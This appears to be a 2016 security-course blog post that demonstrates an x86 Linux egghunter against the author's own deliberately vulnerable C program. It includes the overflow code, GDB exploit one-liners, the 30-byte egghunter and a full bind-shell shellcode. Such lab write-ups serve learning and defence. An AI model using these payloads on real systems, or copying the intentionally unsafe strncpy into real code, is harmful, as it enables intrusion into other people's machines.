Wednesday 15 June 2016

x86 egghunter shellcode research & example

For the third part of my SLAE (http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/) assignments, I have to research a topic that was not covered in the course: egghunter shellcode. I will document my findings here, along with some example code as a proof of concept.

I started by reading the legendary skape's research paper on egghunters, which can be found here: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf. The idea is a fiendishly simple but effective two-stage technique: when you only control a small amount of space at a predictable location in memory, you use that space for a small first stage whose only job is to find the larger part of the shellcode elsewhere in memory.

To do this, the smaller shellcode (the "egghunter") looks for a fixed sequence of bytes, the "egg", which demarcates the beginning of the larger shellcode section. Cleverly, the larger shellcode is prefixed with this signature not once but twice, so that the egghunter does not match the single copy of the signature embedded in its own code. The egghunter searches over memory in a loop and only stops once it has found the egg repeated twice in a row.
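
To make the "doubled egg" check concrete, here is a minimal C sketch of the same search over an ordinary buffer. The function name find_doubled_egg is my own invention for illustration, and unlike the real egghunter this version assumes every byte of the buffer is readable, so it does not need the system-call trick for probing unmapped pages.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not from the paper): scan mem[0..len) for the 4-byte
 * egg repeated twice back to back. Returns a pointer to the first byte after
 * the doubled egg (where the second stage would start), or NULL if the
 * doubled egg is not present. Assumes the whole buffer is readable. */
const unsigned char *find_doubled_egg(const unsigned char *mem, size_t len,
                                      const unsigned char egg[4])
{
    assert(mem != NULL && egg != NULL);

    /* Each candidate position needs 8 readable bytes: egg + egg. */
    for (size_t i = 0; i + 8 <= len; i++) {
        if (memcmp(mem + i, egg, 4) == 0 &&
            memcmp(mem + i + 4, egg, 4) == 0) {
            return mem + i + 8;
        }
    }
    return NULL;
}
```

A single copy of the egg (such as the one inside the hunter itself) is skipped, because the second memcmp fails at that position.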

Since we are limiting the scope of this research to Linux, I will use one of the three Linux egghunter examples provided in the whitepaper;

39 bytes access() system-call
35 bytes access() system-call
30 bytes sigaction() system-call    <----this one :-)

As we can see, these shellcodes are significantly smaller than your average bind or reverse shell.

I put together a quick C program to demonstrate how an egghunter shellcode could work for both heap-based and stack-based second stages as follows;

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Deliberately vulnerable demo program: do not reuse this code. */
int main(int argc, char *argv[])
{
  /* 200 bytes are reserved on the heap for the first argument... */
  char *stuff = (char*)malloc(200 * sizeof(char));
  /* ...but this assignment only repoints stuff at argv[1]; nothing is copied. */
  stuff = argv[1];

  printf("argv[1] = %s\n", argv[1]);
  printf("&argv[1] = %p\n", (void *)&argv[1]);

  printf("argv[2] = %s\n", argv[2]);
  printf("&argv[2] = %p\n", (void *)&argv[2]);

  printf("stuff = %s\n", stuff);
  printf("&stuff = %p\n", (void *)&stuff);

  /* Undersized buffer: copying up to 60 bytes into 5 is the intended overflow. */
  char buf[5];
  strncpy(buf, argv[2], 60);
  printf("buf = %s\n", buf);

  int count;  /* unused */

  /* to crash (within gdb): */
  /* r 1 `perl -e 'print "A"x21 . "B"x4 . "C"x35;'` */

  return 0;
}

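As you can see, the sample vulnerable program accepts two arguments. It reserves 200 bytes on the heap with malloc for the first one and does a bad strncpy of the second into an undersized buffer. Note that, as written, the line "stuff = argv[1];" only repoints the pointer rather than copying the string, so the first argument actually stays in the argv area near the top of the stack (a strncpy into stuff would be needed for a true heap copy). The egghunter does not care either way, since it simply scans readable memory until it finds the doubled egg. I've done it this way so we can see that you can use either heap or stack for the second stage of the shellcode.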

The oversized strncpy overflows buf and overwrites the saved return address, which gives us control of EIP (it holds the B's in the example GDB crash). After that we are left with only 35 bytes for the shellcode (esp points to the beginning of the C's).

Thirty-five bytes isn't a lot of space for shellcode, so this is where the egghunter is going to come in handy. Of course, you could try to scavenge the 21 bytes used by the A's with a jmp back from the end of the initial shellcode section, but this would only give you 56 bytes, and anyway this is an egghunter exercise :)
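
The overflow layout described above (21 filler bytes, a 4-byte return address, then the first stage) can be sketched in C as follows. This is only an illustration of the byte layout: build_overflow and FILLER_LEN are names I made up, and the offset of 21 is taken from the GDB comment in the listing, so it may differ on another compiler or system.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumption: 21 filler bytes reach the saved return address, as in the
 * GDB crash comment of the vulnerable program. */
#define FILLER_LEN 21

/* Hypothetical helper: write filler + little-endian return address + first
 * stage into out. Returns the total length, or 0 if out is too small. */
size_t build_overflow(unsigned char *out, size_t out_size, uint32_t ret_addr,
                      const unsigned char *stage1, size_t stage1_len)
{
    assert(out != NULL && stage1 != NULL);

    size_t total = FILLER_LEN + 4 + stage1_len;
    if (total > out_size)
        return 0;

    memset(out, 'A', FILLER_LEN);

    /* x86 is little-endian, so the least significant byte goes first. */
    out[FILLER_LEN + 0] = (unsigned char)(ret_addr & 0xff);
    out[FILLER_LEN + 1] = (unsigned char)((ret_addr >> 8) & 0xff);
    out[FILLER_LEN + 2] = (unsigned char)((ret_addr >> 16) & 0xff);
    out[FILLER_LEN + 3] = (unsigned char)((ret_addr >> 24) & 0xff);

    memcpy(out + FILLER_LEN + 4, stage1, stage1_len);
    return total;
}
```

With a 35-byte first stage the total comes to 60 bytes, which matches the strncpy limit in the vulnerable program. Keep in mind that the payload travels through argv and strncpy, so it must not contain any 0x00 bytes.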

So we can either deliver our second-stage shellcode via the first argument (the buffer intended for the heap) and hunt for it using the egghunter, OR put the second-stage shellcode in the lower section of the stack with the rest of the program's environment. In this example I will do the former.

As we can see below, the printed addresses (all of them on the stack) change between runs, due to ASLR :-)

 paul@SLAE001:~$ gcc egghunter.c -o egghunter -g -fno-stack-protector -z execstack  
 paul@SLAE001:~$ ./egghunter 111 222  
 argv[1] = 111  
 &argv[1] = 0xbfa5ea28  
 argv[2] = 222  
 &argv[2] = 0xbfa5ea2c  
 stuff = 111  
 &stuff = 0xbfa5e97c  
 buf = 222  
 Segmentation fault (core dumped)  
 paul@SLAE001:~$ ./egghunter 111 222  
 argv[1] = 111  
 &argv[1] = 0xbfc77868  
 argv[2] = 222  
 &argv[2] = 0xbfc7786c  
 stuff = 111  
 &stuff = 0xbfc777bc  
 buf = 222  
 ...  


Knowing that the C's line up with esp, our next step is to find a jmp esp instruction. We will do this within GDB by first locating libc and then searching within it for the right opcode bytes (0xff, 0xe4);

 (gdb) info proc mappings   
 process 4369  
 Mapped address spaces:  
   
      Start Addr  End Addr    Size   Offset objfile  
       0x8048000 0x8060000  0x18000    0x0 /bin/dash  
       0x8060000 0x8061000   0x1000  0x17000 /bin/dash  
       0x8061000 0x8062000   0x1000  0x18000 /bin/dash  
       0x8062000 0x8085000  0x23000    0x0 [heap]  
      0xb7e21000 0xb7e22000   0x1000    0x0   
      0xb7e22000 0xb7fc5000  0x1a3000    0x0 /lib/i386-linux-gnu/libc-2.15.so  
      0xb7fc5000 0xb7fc7000   0x2000  0x1a3000 /lib/i386-linux-gnu/libc-2.15.so  
      0xb7fc7000 0xb7fc8000   0x1000  0x1a5000 /lib/i386-linux-gnu/libc-2.15.so  
      0xb7fc8000 0xb7fcb000   0x3000    0x0   
      0xb7fdb000 0xb7fdd000   0x2000    0x0   
      0xb7fdd000 0xb7fde000   0x1000    0x0 [vdso]  
      0xb7fde000 0xb7ffe000  0x20000    0x0 /lib/i386-linux-gnu/ld-2.15.so  
      0xb7ffe000 0xb7fff000   0x1000  0x1f000 /lib/i386-linux-gnu/ld-2.15.so  
      0xb7fff000 0xb8000000   0x1000  0x20000 /lib/i386-linux-gnu/ld-2.15.so  
      0xbffdf000 0xc0000000  0x21000    0x0 [stack]  
 (gdb) find /b 0xb7e22000, 0xb7fc5000, 0xff, 0xe4  
 0xb7e24a55  
 0xb7f7b00b  
 ...  

Many matches come back. We will take the first one and replace the B's with this address. I test this in two steps: first by landing on a soft breakpoint (0xcc, int3) placed directly after the return address, and then with a second attempt where we land in the egghunter, having fed in the egg via the first argument, followed by another soft breakpoint;

 (gdb) r `perl -e 'print "AAAA";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\xcc\xcc\xcc\xcc" . "C"x31;'`  
 Starting program: /home/paul/egghunter `perl -e 'print "AAAA";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\xcc\xcc\xcc\xcc" . "C"x31;'`  
 argv[1] = AAAA  
 &argv[1] = 0xbffff728  
 argv[2] = AAAAAAAAAAAAAAAAAAAAAUJ������CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC  
 &argv[2] = 0xbffff72c  
 stuff = AAAA  
 &stuff = 0xbffff67c  
 buf = AAAAAAAAAAAAAAAAAAAAAUJ������CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC�o��  
   
 Program received signal SIGTRAP, Trace/breakpoint trap.  
 0xbffff691 in ?? ()  
 (gdb) r `perl -e 'print "\x90\x50\x90\x50\x90\x50\x90\x50" . "\xcc\xcc\xcc\xcc";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7" . "C"x5;'`  
 The program being debugged has been started already.  
 Start it from the beginning? (y or n) y  
   
 Starting program: /home/paul/egghunter `perl -e 'print "\x90\x50\x90\x50\x90\x50\x90\x50" . "\xcc\xcc\xcc\xcc";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7" . "C"x5;'`  
 argv[1] = �P�P�P�P����  
 &argv[1] = 0xbffff718  
 argv[2] = AAAAAAAAAAAAAAAAAAAAAUJ��f���AjCX̀<�t���P�P�ϯu��u���CCCCC  
 &argv[2] = 0xbffff71c  
 stuff = �P�P�P�P����  
 &stuff = 0xbffff66c  
 buf = AAAAAAAAAAAAAAAAAAAAAUJ��f���AjCX̀<�t���P�P�ϯu��u���CCCC�o��  
   ...couple of seconds delay here while memory is searched...
 Program received signal SIGTRAP, Trace/breakpoint trap.  
 0xbffff869 in ?? ()  
 (gdb)   
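
For reference, here are the 30 egghunter bytes from the one-liner above as a C array, split per instruction. The disassembly in the comments is my own reading of the bytes, so treat it as an annotated sketch rather than an authoritative listing; the names egghunter and egghunter_len are just for this illustration.

```c
#include <assert.h>
#include <stddef.h>

/* The sigaction-based egghunter bytes used in the GDB session. */
static const unsigned char egghunter[] = {
    0x66, 0x81, 0xc9, 0xff, 0x0f, /* or   cx, 0xfff       ; ecx -> last byte of the current 4 KiB page */
    0x41,                         /* inc  ecx             ; next address to probe                       */
    0x6a, 0x43,                   /* push 0x43            ; 67 = sigaction on 32-bit x86 Linux          */
    0x58,                         /* pop  eax                                                           */
    0xcd, 0x80,                   /* int  0x80            ; kernel tries to read the pointer in ecx     */
    0x3c, 0xf2,                   /* cmp  al, 0xf2        ; low byte of -EFAULT (-14)                   */
    0x74, 0xf1,                   /* jz   -15             ; unreadable: back to "or cx", next page      */
    0xb8, 0x90, 0x50, 0x90, 0x50, /* mov  eax, 0x50905090 ; the egg (bytes 90 50 90 50 in memory)       */
    0x89, 0xcf,                   /* mov  edi, ecx                                                      */
    0xaf,                         /* scasd                ; compare [edi] with eax, edi += 4            */
    0x75, 0xec,                   /* jnz  -20             ; no match: back to "inc ecx"                 */
    0xaf,                         /* scasd                ; the egg must appear a second time           */
    0x75, 0xe9,                   /* jnz  -23             ; no match: back to "inc ecx"                 */
    0xff, 0xe7                    /* jmp  edi             ; edi now points just past the doubled egg    */
};

/* Compile-time check that the array really is the 30-byte variant. */
static_assert(sizeof egghunter == 30, "expected the 30-byte sigaction egghunter");

size_t egghunter_len(void)
{
    return sizeof egghunter;
}
```

Together with the 21 A's, the 4-byte jmp esp address and the 5 trailing C's, this adds up to the 60 bytes that the strncpy copies.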
   

Okay, this worked nicely :-) For the final step we are going to supply the egg followed by a bind shellcode in the first argument and test this;

 (gdb) r `perl -e 'print "\x90\x50\x90\x50\x90\x50\x90\x50" . "\x31\xc0\x31\xdb\x31\xf6\xb3\x01\x56\x6a\x01\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\xb3\x02\x56\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\x56\x52\x89\xe1\xb0\x66\xcd\x80\xb3\x05\x56\x56\x52\x89\xe1\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6\xb0\x0b\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7" . "C"x5;'`  
 The program being debugged has been started already.  
 Start it from the beginning? (y or n) y  
   
 Starting program: /home/paul/egghunter `perl -e 'print "\x90\x50\x90\x50\x90\x50\x90\x50" . "\x31\xc0\x31\xdb\x31\xf6\xb3\x01\x56\x6a\x01\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\xb3\x02\x56\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\x56\x52\x89\xe1\xb0\x66\xcd\x80\xb3\x05\x56\x56\x52\x89\xe1\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6\xb0\x0b\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";'` `perl -e 'print "A"x21 . "\x55\x4a\xe2\xb7" . "\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7" . "C"x5;'`  
 argv[1] = �P�P�P�P1�1�1�� Vj j ���f̀�³ Vfh \fj ��j QP���f̀� VR���f̀�VVR���f̀��1ɰ?̀A�� u��  
                                           Vh//shh/bin��1�1�̀  
 &argv[1] = 0xbffff6b8  
 argv[2] = AAAAAAAAAAAAAAAAAAAAAUJ��f���AjCX̀<�t���P�P�ϯu��u���CCCCC  
 &argv[2] = 0xbffff6bc  
 stuff = �P�P�P�P1�1�1�� Vj j ���f̀�³ Vfh \fj ��j QP���f̀� VR���f̀�VVR���f̀��1ɰ?̀A�� u��  
                                          Vh//shh/bin��1�1�̀  
 &stuff = 0xbffff60c  
 buf = AAAAAAAAAAAAAAAAAAAAAUJ��f���AjCX̀<�t���P�P�ϯu��u���CCCC�o��  
 process 4399 is executing new program: /bin/dash  
   
   


Awesome!  This worked!  The C file used for this research post can be found here: https://github.com/pabb85/SLAE/blob/master/egghunter.c


Connecting to my egghunter-found bind shell :-)


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification, Student ID:  SLAE-469.